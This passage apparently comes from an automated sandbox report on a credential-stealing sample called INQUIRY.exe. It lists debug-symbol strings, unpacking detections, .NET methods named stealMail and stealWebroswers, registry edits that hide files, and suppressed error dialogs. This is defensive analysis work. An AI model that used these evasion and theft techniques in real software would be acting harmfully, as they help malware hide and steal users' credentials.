                    Source: Binary string: System.Runtime.Remoting.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: version.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wintrust.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorrc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb- source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmiutils.pdbbi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: psapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: WMINet_Utils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdbS source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdbee-c source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.699952597.0000000002BCD000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776039564.0000000002E8A000.00000004.00000001.sdmp
                    Source: Binary string: tsymbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: combase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc.pdbThqia source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: 1_oC:\Windows\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: culture.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: crypt32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cfgmgr32.pdb; source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: edputil.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp

                    Data Obfuscation:

                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 1.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 16.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 28.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 33.2.INQUIRY.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                    Detected unpacking (creates a PE file in dynamic memory)
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 1.2.INQUIRY.exe.2300000.3.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 16.2.INQUIRY.exe.2490000.3.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 33.2.INQUIRY.exe.2380000.3.unpack
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 1.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 16.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 28.2.INQUIRY.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\INQUIRY.exe Unpacked PE file: 33.2.INQUIRY.exe.400000.0.unpack
                    .NET source code contains potential unpacker
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004414DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00441B28 push 00441BB5h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0040C020 push 0040C098h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00430030 push 0043005Ch; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0040C09A push 0040C10Bh; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0040C09C push 0040C10Bh; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0040C17A push 0040C1A8h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0040C17C push 0040C1A8h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00430198 push 004301C4h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004101B0 push 00410211h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00410214 push 00410415h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0040C2A4 push eax; retn 0040h
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004583D8 push 00458404h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00410418 push 0041055Ch; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00426524 push 004265F4h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00410530 push 0041055Ch; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0046A5E4 push ecx; mov dword ptr [esp], ecx
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0040659E push 004065F1h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004065A0 push 004065F1h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0041C6E4 push ecx; mov dword ptr [esp], edx
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00406770 push 0040679Ch; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00426704 push 00426730h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004667D8 push 00466804h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004627D8 push ecx; mov dword ptr [esp], ecx
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0040682C push 00406858h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0046A8F4 push 0046A91Ah; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0046A958 push 0046A984h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0041A978 push ecx; mov dword ptr [esp], edx
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004269BC push 004269E8h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00428A50 push 00428A7Ch; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00444A7C push 00444AA8h; ret
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00428A04 push 00428A45h; ret

                    Hooking and other Techniques for Hiding and Protection:

                    Changes the view of files in windows explorer (hidden files and folders)
                    Source: C:\Users\user\Desktop\INQUIRY.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00455880 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0043C658 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00452974 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0043CF3C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00427418 IsIconic,GetWindowPlacement,GetWindowRect,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0043BDB0 IsIconic,GetCapture,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_00455880 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_0043C658 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_00452974 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_0043CF3C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_00427418 IsIconic,GetWindowPlacement,GetWindowRect,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_0043BDB0 IsIconic,GetCapture,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004414DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicket
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process information set: NOGPFAULTERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
